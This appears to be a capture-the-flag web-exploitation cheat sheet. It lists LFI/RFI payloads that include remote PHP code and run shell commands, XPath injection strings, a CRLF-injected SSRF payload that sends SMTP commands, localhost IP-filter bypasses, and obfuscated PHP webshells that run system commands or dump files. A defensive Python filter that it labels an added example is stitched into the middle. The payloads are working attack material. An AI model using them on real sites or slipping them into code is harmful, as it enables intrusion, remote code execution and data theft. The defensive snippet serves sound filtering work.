* Useful commands

curl 'url' -H 'header: header' --data 'data=data'


* LFI & RFI

http://test/?page=php://filter/convert.base64-encode/resource=index.php

http://test/?page=php://filter/convert.base64-decode/resource=./upload/abcde

http://test/?page=data://text/plain,%3Cxmp%3E%3C?php%20system($_GET[%27x%27]);&x=ls%20-al

http://test/?page=http://pastebin.com/raw/abcd/?&x=ls%20-al


* Xpath Injection

' or substring(name(parent::*[position()=1]),1,1)='u

' or substring(name(//node()[position()=6]),1,1)='f

' or substring(//flag_fcad489d[position()=1],1,1)='f


* SSRF

https://127.0.0.2%0d%0aHELO 127.0.0.2%0aMAIL FROM: <A@B.C>%0aRCPT TO: <zairo@ruu.kr>%0aDATA%0aFROM: AAA@B.C%0aTO: zairo@ruu.kr%0aSUBJECT: give me the flag%0d%0a.%0d%0a%0aQUIT%0a:25/


bypass etc...

- Various IP bypass methods

http://127.0.0.1    =>    http://2130706433/

http://127.0.0.1    =>    http://0x7f000001/

http://127.0.0.1    =>    http://0x7f.0x00.0x00.0x01

http://127.0.0.1    =>    http://017700000001/

http://127.0.0.1    =>    http://0177.000.000.01/

http://127.0.0.1    =>    http://0/
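
Every notation in the list above is accepted by inet_aton-style parsers as a valid IPv4 address, so a filter that compares the host string against "127.0.0.1" never matches them. The following is an added example, not part of the original post: a filter-side check in Python that normalizes those forms before classifying the target and refuses URLs carrying raw or encoded CR/LF like the SMTP one above. The function names and verdict strings are assumptions made for this sketch.

```python
import ipaddress
from urllib.parse import urlsplit

def _part(p):
    """One dotted component, inet_aton style: 0x.. is hex, a leading 0 is octal."""
    if p[:2].lower() == "0x":
        digits, base = p[2:], 16
    elif len(p) > 1 and p[0] == "0":
        digits, base = p[1:], 8
    else:
        digits, base = p, 10
    allowed = "0123456789abcdef"[:base]
    if not digits or any(c not in allowed for c in digits.lower()):
        return None
    return int(digits, base)

def parse_legacy_ipv4(host):
    """Return the IPv4Address a libc-style parser would see, or None if not numeric."""
    nums = [_part(p) for p in host.split(".")]
    if not 1 <= len(nums) <= 4 or None in nums:
        return None
    *head, last = nums
    # Leading parts are single bytes; the last part fills all remaining bytes.
    if any(n > 255 for n in head) or last >= 256 ** (5 - len(nums)):
        return None
    value = last
    for i, n in enumerate(head):
        value |= n << (8 * (3 - i))
    return ipaddress.IPv4Address(value)

def classify_url(url):
    """SSRF verdict: reject-crlf, reject-internal, needs-dns-check or allow."""
    low = url.lower()
    if "%0d" in low or "%0a" in low or any(ord(c) < 0x20 for c in url):
        return "reject-crlf"          # raw or encoded CR/LF or control bytes
    host = urlsplit(url).hostname
    if not host:
        return "reject-internal"      # nothing to validate: refuse
    addr = parse_legacy_ipv4(host)
    if addr is None:
        try:
            addr = ipaddress.ip_address(host)   # IPv6 literal such as ::1
        except ValueError:
            return "needs-dns-check"  # a name: resolve it, classify every address
    return "allow" if addr.is_global else "reject-internal"

if __name__ == "__main__":
    # Host forms taken from the list above, plus one public address for contrast.
    for u in ("http://2130706433/", "http://0177.000.000.01/", "http://0/", "http://8.8.8.8/"):
        print(u, "->", classify_url(u))
```

The check only covers the literal in the URL; the address the HTTP client actually connects to (after DNS resolution and any redirect) needs the same classification.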


* webshell

- non-alpha webshell

<?=$_='$<>/'^'{{{{';${$_}[_](${$_}[__]);

// $_= '$<>/' ^ '{{{{' ----> $_ = '_GET'
// ${_GET}[_](${_GET}[__]);
// final <?=$_GET[_]($_GET[__])
// webshell.php?_=system&__=ls -al
// reference : https://ctftime.org/writeup/10429


<?=`{${~"����"}[_]}`;
// echo -ne '<?=`{${~"\xa0\xb8\xba\xab"}[_]}`;'
// ?_=ls -al
// reference : https://ctftime.org/writeup/10429


<?=`/???/??? ../*`;
// 19 bytes (cat all files from ../)
// reference : https://ctftime.org/writeup/10429

